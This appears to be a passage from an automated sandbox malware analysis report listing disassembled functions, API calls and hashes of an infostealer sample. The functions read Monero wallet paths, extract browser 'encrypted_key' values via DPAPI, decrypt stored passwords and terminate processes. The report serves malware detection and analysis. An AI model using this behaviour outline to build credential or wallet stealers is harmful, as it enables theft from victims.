                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 4c89c188936cfdb1437e3e372b0048079055acc26142cb7a398ec81f50adcc9b
                                • Instruction ID: ccf71dcd39af53a5733c99adeaba91fa83724b066f4d5f3b1566f21ecb5ee354
                                • Opcode Fuzzy Hash: 4c89c188936cfdb1437e3e372b0048079055acc26142cb7a398ec81f50adcc9b
                                • Instruction Fuzzy Hash: 3E712FB1D0021DAFDF11DF95CC81AEEBBB8EF45300F1445A9E509E7240EB319A89CB91
                                Function 00391120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                • RegCloseKey.ADVAPI32(?), ref: 0039117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 0039114F
                                • wallet_path, xrefs: 0039116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                                • Instruction ID: fcfe0044d8c5aee3840d2ee4a6069c6eb20c3597b629a60ff7ce0a44b6f8d188
                                • Opcode Fuzzy Hash: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                                • Instruction Fuzzy Hash: E3F03075640309BFD7109BE49C4DFEA7B7CEB14715F100159FE05E2281E6B05A58A7A0
                                Function 00399DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00399E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00399E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00399EA7
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • lstrcpy.KERNEL32(00000000,003C4C48), ref: 00399FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: daf558d58bed2bc816006fb04a73893da0665030ad1b0014245ed095a50cd32b
                                • Instruction ID: 203313e890f2c9a76368c5c4621bbde38b21516570a238d4caf870b693cab5d5
                                • Opcode Fuzzy Hash: daf558d58bed2bc816006fb04a73893da0665030ad1b0014245ed095a50cd32b
                                • Instruction Fuzzy Hash: ED51B032A11209ABCF12EF68DC85BDEB7A8EF54315F154029F90AEF251DB70ED158B90
                                Function 00395640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0039565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00395661
                                • InternetOpenA.WININET(003BCFEC,00000000,00000000,00000000,00000000), ref: 00395677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00395692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003956BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 003956E1
                                • InternetCloseHandle.WININET(?), ref: 003956FA
                                • InternetCloseHandle.WININET(00000000), ref: 00395701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                                • Instruction ID: 3dfac3ada738dc2fa6e0e1f9b78ebfd7383e7072fa611155aea628f865ae6aad
                                • Opcode Fuzzy Hash: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                                • Instruction Fuzzy Hash: 3C41A270A00605EFDB16CF95DC88FAAB7B5FF48305F1580A9E908DB290D7719985CF94
                                Function 003B4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                • CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                • CloseHandle.KERNEL32(00000000), ref: 003B47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                                • Instruction ID: 80dce8281f8c0c6b1710fe96f41c51a0ddaf7cb3a69d45f04ac5b62587822172
                                • Opcode Fuzzy Hash: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                                • Instruction Fuzzy Hash: FF01B571601618AFE7215B609C8EFFA77BCEB58755F0101C4FA05E1182EF74CD88DAA4
                                Function 003A83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A846C
                                • lstrlen.KERNEL32(00000000), ref: 003A84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A84E9
                                • lstrlen.KERNEL32(00000000), ref: 003A84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A852E
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 92288dfa30f816ddfffed33699fa446f6ddb8306df354860e87a962606dd31e9
                                • Instruction ID: eea75218ea74da75086f4b7a22a5aa73414d85e63cdae384d45304ee6dcef4b8
                                • Opcode Fuzzy Hash: 92288dfa30f816ddfffed33699fa446f6ddb8306df354860e87a962606dd31e9
                                • Instruction Fuzzy Hash: 1251D2719006029FCB22DF29D884A9BB7F8EF5A300F19846DEC45DB205EF34E941CB90
                                Function 003B2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003B28A9), ref: 003B294B
                                • RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                • RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                                • Instruction ID: 84a6590cc89be4e9f103402c61b40af244c7bf8562db562d11e6d0f5f864fa67
                                • Opcode Fuzzy Hash: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                                • Instruction Fuzzy Hash: A101BC75600218AFE320CBA09C5DEFB7BBCEB48755F100198FE49EB240EA315A0887A0
                                Function 003B2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B289C
                                  • Part of subcall function 003B2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                  • Part of subcall function 003B2910: RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                  • Part of subcall function 003B2910: RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003B28A9), ref: 003B294B
                                  • Part of subcall function 003B2910: RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                  • Part of subcall function 003B2910: RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003A9500), ref: 003B28D1
                                • RegQueryValueExA.ADVAPI32(003A9500,00F7F358,00000000,00000000,00000000,000000FF), ref: 003B28EC
                                • RegCloseKey.ADVAPI32(003A9500), ref: 003B28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                                • Instruction ID: dff611154c9ce47080dac8172782bffd917045ddbf6d9438263a4ed8ca9c05df
                                • Opcode Fuzzy Hash: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                                • Instruction Fuzzy Hash: C401A275600618BFD7109BA4AC4DFFB777CEB54315F000158FE08D6250DA705D4897A0
                                Function 003971F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 0039723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00397279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00397280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003972C3
                                • HeapFree.KERNEL32(00000000), ref: 003972CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00397329
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 1ce7f8852057cb1d9d411936b2644121c7f626b971fa38a1b3db578f3632e455
                                • Instruction ID: 73b982a83da2344b4713aff2ff03bbc3bc7602c3f3720c1867be9960881879b7
                                • Opcode Fuzzy Hash: 1ce7f8852057cb1d9d411936b2644121c7f626b971fa38a1b3db578f3632e455
                                • Instruction Fuzzy Hash: 9D415A757156069BDB21CFA9DC84BAAB3E8FB88305F1445A9EC4DC7390E631E900DB90
                                Function 00399C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00399CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00399CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00399D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 4a173fe232d286c5d278b425c1110b5159a348dc13500cf645bd694310dd0b69
